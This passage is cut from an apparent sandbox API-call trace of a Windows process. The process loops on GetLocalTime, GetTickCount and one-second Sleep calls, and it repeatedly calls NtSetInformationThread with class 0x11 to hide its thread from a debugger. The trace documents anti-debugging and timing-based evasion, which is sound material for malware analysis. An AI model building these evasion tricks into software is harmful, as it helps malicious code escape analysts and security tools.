lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x36a)) [0199.043] GetTickCount () returned 0x1d377f6 [0199.043] Sleep (dwMilliseconds=0x3e8) [0199.045] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x36c)) [0199.045] GetTickCount () returned 0x1d37bdd [0199.045] Sleep (dwMilliseconds=0x3e8) [0199.047] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x36e)) [0199.047] GetTickCount () returned 0x1d37fc4 [0199.047] Sleep (dwMilliseconds=0x3e8) [0199.053] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x374)) [0199.054] GetTickCount () returned 0x1d383bb [0199.054] Sleep (dwMilliseconds=0x3e8) [0199.055] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x377)) [0199.056] GetTickCount () returned 0x1d387a2 [0199.056] Sleep (dwMilliseconds=0x3e8) [0199.063] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x37e)) [0199.063] GetTickCount () returned 0x1d38b89 [0199.063] Sleep (dwMilliseconds=0x3e8) [0199.066] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x381)) [0199.066] GetTickCount () returned 0x1d38f70 [0199.066] Sleep (dwMilliseconds=0x3e8) [0199.067] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x383)) [0199.069] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.070] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.070] GetCurrentThread () returned 0xfffffffe [0199.070] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.070] GetTickCount () returned 0x1d39366 [0199.070] Sleep (dwMilliseconds=0x3e8) [0199.162] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x3d8)) [0199.162] GetTickCount () returned 0x1d3979b [0199.162] Sleep (dwMilliseconds=0x3e8) [0199.213] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x23)) [0199.213] GetTickCount () returned 0x1d39bb1 [0199.214] Sleep (dwMilliseconds=0x3e8) [0199.268] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x5a)) [0199.268] GetTickCount () returned 0x1d39fd7 [0199.268] Sleep (dwMilliseconds=0x3e8) [0199.271] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x5d)) [0199.271] GetTickCount () returned 0x1d3a3be [0199.271] Sleep (dwMilliseconds=0x3e8) [0199.273] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x60)) [0199.274] GetTickCount () returned 0x1d3a7a5 [0199.274] Sleep (dwMilliseconds=0x3e8) [0199.275] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x61)) [0199.275] GetTickCount () returned 0x1d3ab8c [0199.276] Sleep (dwMilliseconds=0x3e8) [0199.277] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x63)) [0199.277] GetTickCount () returned 0x1d3af73 [0199.277] Sleep (dwMilliseconds=0x3e8) [0199.284] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x6a)) [0199.284] GetTickCount () returned 0x1d3b369 [0199.284] Sleep (dwMilliseconds=0x3e8) [0199.286] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x6c)) [0199.286] GetTickCount () returned 0x1d3b750 [0199.286] Sleep (dwMilliseconds=0x3e8) [0199.288] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x6e)) [0199.289] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.289] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.289] GetCurrentThread () returned 0xfffffffe [0199.290] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.290] GetTickCount () returned 0x1d3bb37 [0199.290] Sleep (dwMilliseconds=0x3e8) [0199.291] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x71)) [0199.291] GetTickCount () returned 0x1d3bf1e [0199.291] Sleep (dwMilliseconds=0x3e8) [0199.295] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x75)) [0199.295] GetTickCount () returned 0x1d3c305 [0199.296] Sleep (dwMilliseconds=0x3e8) [0199.297] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x77)) [0199.297] GetTickCount () returned 0x1d3c6fc [0199.297] Sleep (dwMilliseconds=0x3e8) [0199.298] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x79)) [0199.299] GetTickCount () returned 0x1d3cae3 [0199.299] Sleep (dwMilliseconds=0x3e8) [0199.300] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x7a)) [0199.300] GetTickCount () returned 0x1d3ceca [0199.301] Sleep (dwMilliseconds=0x3e8) [0199.303] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x7d)) [0199.303] GetTickCount () returned 0x1d3d2b1 [0199.303] Sleep (dwMilliseconds=0x3e8) [0199.304] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x7e)) [0199.305] GetTickCount () returned 0x1d3d698 [0199.305] Sleep (dwMilliseconds=0x3e8) [0199.307] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x81)) [0199.307] GetTickCount () returned 0x1d3da7f [0199.307] Sleep (dwMilliseconds=0x3e8) [0199.310] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x84)) [0199.310] GetTickCount () returned 0x1d3de66 [0199.310] Sleep (dwMilliseconds=0x3e8) [0199.314] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x88)) [0199.315] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.315] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.315] GetCurrentThread () returned 0xfffffffe [0199.315] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.316] GetTickCount () returned 0x1d3e25c [0199.316] Sleep (dwMilliseconds=0x3e8) [0199.318] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x8c)) [0199.318] GetTickCount () returned 0x1d3e643 [0199.318] Sleep (dwMilliseconds=0x3e8) [0199.319] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x8e)) [0199.320] GetTickCount () returned 0x1d3ea2a [0199.320] Sleep (dwMilliseconds=0x3e8) [0199.321] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x8f)) [0199.321] GetTickCount () returned 0x1d3ee11 [0199.322] Sleep (dwMilliseconds=0x3e8) [0199.326] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x94)) [0199.326] GetTickCount () returned 0x1d3f1f8 [0199.326] Sleep (dwMilliseconds=0x3e8) [0199.328] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x96)) [0199.328] GetTickCount () returned 0x1d3f5df [0199.328] Sleep (dwMilliseconds=0x3e8) [0199.329] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x97)) [0199.330] GetTickCount () returned 0x1d3f9d6 [0199.330] Sleep (dwMilliseconds=0x3e8) [0199.331] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x99)) [0199.331] GetTickCount () returned 0x1d3fdbd [0199.331] Sleep (dwMilliseconds=0x3e8) [0199.334] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x9c)) [0199.335] GetTickCount () returned 0x1d401a4 [0199.335] Sleep (dwMilliseconds=0x3e8) [0199.338] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0xa0)) [0199.338] GetTickCount () returned 0x1d4058b [0199.338] Sleep (dwMilliseconds=0x3e8) [0199.340] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0xa2)) [0199.341] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.341] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.341] GetCurrentThread () returned 0xfffffffe [0199.341] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.342] GetTickCount () returned 0x1d40972 [0199.342] Sleep (dwMilliseconds=0x3e8) [0199.480] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x12e)) [0199.480] GetTickCount () returned 0x1d40de5 [0199.480] Sleep (dwMilliseconds=0x3e8) [0199.533] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x163)) [0199.533] GetTickCount () returned 0x1d4120b [0199.533] Sleep (dwMilliseconds=0x3e8) [0199.539] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x169)) [0199.539] GetTickCount () returned 0x1d415f2 [0199.539] Sleep (dwMilliseconds=0x3e8) [0199.541] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x16b)) [0199.541] GetTickCount () returned 0x1d419d9 [0199.541] Sleep (dwMilliseconds=0x3e8) [0199.542] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x16c)) [0199.542] GetTickCount () returned 0x1d41dc0 [0199.542] Sleep (dwMilliseconds=0x3e8) [0199.544] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x16e)) [0199.544] GetTickCount () returned 0x1d421a7 [0199.544] Sleep (dwMilliseconds=0x3e8) [0199.545] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x16f)) [0199.545] GetTickCount () returned 0x1d4258e [0199.545] Sleep (dwMilliseconds=0x3e8) [0199.548] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x172)) [0199.548] GetTickCount () returned 0x1d42984 [0199.548] Sleep (dwMilliseconds=0x3e8) [0199.552] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x176)) [0199.552] GetTickCount () returned 0x1d42d6b [0199.552] Sleep (dwMilliseconds=0x3e8) [0199.553] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x177)) [0199.554] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.554] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.554] GetCurrentThread () returned 0xfffffffe [0199.554] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.555] GetTickCount () returned 0x1d43152 [0199.555] Sleep (dwMilliseconds=0x3e8) [0199.559] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x17d)) [0199.560] GetTickCount () returned 0x1d43539 [0199.560] Sleep (dwMilliseconds=0x3e8) [0199.561] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x17f)) [0199.561] GetTickCount () returned 0x1d43920 [0199.561] Sleep (dwMilliseconds=0x3e8) [0199.563] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x181)) [0199.563] GetTickCount () returned 0x1d43d17 [0199.563] Sleep (dwMilliseconds=0x3e8) [0199.566] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x184)) [0199.566] GetTickCount () returned 0x1d440fe [0199.566] Sleep (dwMilliseconds=0x3e8) [0199.571] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x189)) [0199.571] GetTickCount () returned 0x1d444e5 [0199.571] Sleep (dwMilliseconds=0x3e8) [0199.573] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x18b)) [0199.573] GetTickCount () returned 0x1d448cc [0199.573] Sleep (dwMilliseconds=0x3e8) [0199.575] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x18d)) [0199.575] GetTickCount () returned 0x1d44cb3 [0199.575] Sleep (dwMilliseconds=0x3e8) [0199.576] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x18e)) [0199.576] GetTickCount () returned 0x1d450aa [0199.578] Sleep (dwMilliseconds=0x3e8) [0199.582] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x194)) [0199.582] GetTickCount () returned 0x1d45491 [0199.582] Sleep (dwMilliseconds=0x3e8) [0199.584] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x196)) [0199.584] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.584] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.585] GetCurrentThread () returned 0xfffffffe [0199.585] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.586] GetTickCount () returned 0x1d45878 [0199.586] Sleep (dwMilliseconds=0x3e8) [0199.590] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x19c)) [0199.590] GetTickCount () returned 0x1d45c5f [0199.590] Sleep (dwMilliseconds=0x3e8) [0199.592] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x19e)) [0199.592] GetTickCount () returned 0x1d46046 [0199.592] Sleep (dwMilliseconds=0x3e8) [0199.594] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1a0)) [0199.594] GetTickCount () returned 0x1d4643c [0199.594] Sleep (dwMilliseconds=0x3e8) [0199.595] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1a1)) [0199.595] GetTickCount () returned 0x1d46823 [0199.595] Sleep (dwMilliseconds=0x3e8) [0199.597] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1a2)) [0199.599] GetTickCount () returned 0x1d46c0a [0199.599] Sleep (dwMilliseconds=0x3e8) [0199.601] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1a7)) [0199.602] GetTickCount () returned 0x1d46ff1 [0199.602] Sleep (dwMilliseconds=0x3e8) [0199.603] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1a9)) [0199.603] GetTickCount () returned 0x1d473d8 [0199.603] Sleep (dwMilliseconds=0x3e8) [0199.605] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1ab)) [0199.605] GetTickCount () returned 0x1d477bf [0199.605] Sleep (dwMilliseconds=0x3e8) [0199.608] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1ae)) [0199.608] GetTickCount () returned 0x1d47ba6 [0199.608] Sleep (dwMilliseconds=0x3e8) [0199.611] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1b1)) [0199.614] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.615] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.615] GetCurrentThread () returned 0xfffffffe [0199.615] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.615] GetTickCount () returned 0x1d47f9d [0199.615] Sleep (dwMilliseconds=0x3e8) [0199.618] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1b8)) [0199.618] GetTickCount () returned 0x1d48384 [0199.618] Sleep (dwMilliseconds=0x3e8) [0199.619] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1b9)) [0199.620] GetTickCount () returned 0x1d4876b [0199.620] Sleep (dwMilliseconds=0x3e8) [0199.621] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1bb)) [0199.622] GetTickCount () returned 0x1d48b52 [0199.622] Sleep (dwMilliseconds=0x3e8) [0199.623] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1bd)) [0199.623] GetTickCount () returned 0x1d48f39 [0199.623] Sleep (dwMilliseconds=0x3e8) [0199.624] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1be)) [0199.624] GetTickCount () returned 0x1d49320 [0199.624] Sleep (dwMilliseconds=0x3e8) [0199.625] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1bf)) [0199.626] GetTickCount () returned 0x1d49716 [0199.626] Sleep (dwMilliseconds=0x3e8) [0199.670] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, 